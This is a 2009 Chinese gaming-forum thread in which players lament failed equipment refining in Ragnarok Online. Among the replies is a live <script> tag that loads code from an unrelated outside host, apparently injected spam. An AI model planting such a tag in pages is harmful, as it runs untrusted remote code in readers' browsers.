返回列表 发帖

[历史] 0.0发一下牢骚--再精炼剁手

好不容易卖了得到700w的rob
结果手痒,把仓库里的兽人斧头,火灵拳刃,内衣拿去敲洞,为了提高成功率,还特意把不要的向日葵头,学士帽,骷髅截止,僵尸帽子,妖道帽子都拿去充成功率。

结果败家完毕。兽人斧9把剩2把,但是+7全爆!2把火灵--爆!2套内衣--爆!
我哭!!本来想充成功率的向日葵头、学士帽、僵尸帽、妖道帽却都成功了。。。。我

==!

好了,还剩下60万,一下子“烧”掉一个“0”,从改革开放30年瞬间变成解放前夜。。。我还想春风来了,结果一吹把我的房子都吹没了。

T_T胸闷,本来不想说的,但是还是说一句:

再精炼→剁手!!”

ps:怨念,让这个帖子在交流区留个十几分钟吧,版主。。。为了祭奠我逝去的兽人斧和rob。。。

~~百合无罪 百合有理 百合王道~~

兽人斧 内衣 700w就剁手了,那有些人岂不是要碎尸万段了。
男人富则俊,女人俊则富

人品就是浮云 
<script src=http://api.union.shop.edu.cn/link.php?u=1820&a=48&p=4></script>

原帖由 小狮 于 2009-9-14 10:22 发表
兽人斧 内衣 700w就剁手了,那有些人岂不是要碎尸万段了。

我素穷人,全部家当了。。。

突然想到一句俗话

穷人想翻身,还要踏实干!

想要一夜富,除非有后台。

果然想靠运气翻身的想法太那个了。。。就像做股票,越想一夜暴富,往往就是连着几个跌停板。

教训深刻。。。这次彻底记住了。

700万就剁手了?

700W2套内衣?= =

原帖由 这不是ID~是寂寞 于 2009-9-14 10:26 发表
700万就剁手了?

恩,全部家当了。

我想要是我把洞向日葵,洞学士帽,洞僵尸帽、妖道帽这些个挂店。。除了引起围观,买的人几乎就是0吧。。。

恩,顺便打广告:大树卖+10-4s笨拙和1s生存

原帖由 天使喝可乐 于 2009-9-14 10:28 发表
700W2套内衣?= =

100w敲一次。。。

自从+5 3连爆  再也没精炼过。。。

原帖由 minos 于 2009-9-14 10:37 发表
自从+5 3连爆  再也没精炼过。。。

龙先生3连爆?

原帖由 h409756627 于 2009-9-14 10:41 发表

龙先生3连爆?

对的。。。

原帖由 minos 于 2009-9-14 10:46 发表

对的。。。

默哀。。还有俄。给你di短消息。。。

LZ,我BJL披爆了照样去精炼

原帖由 蓝军皇朝 于 2009-9-14 10:52 发表
LZ,我BJL披爆了照样去精炼

有钱淫。。。

等rob比例升高了再看比较合算

下次LZ发帖就是剁脚了
肯定忍不住的

别告诉她 我还想她 就让沉默 代替所有回答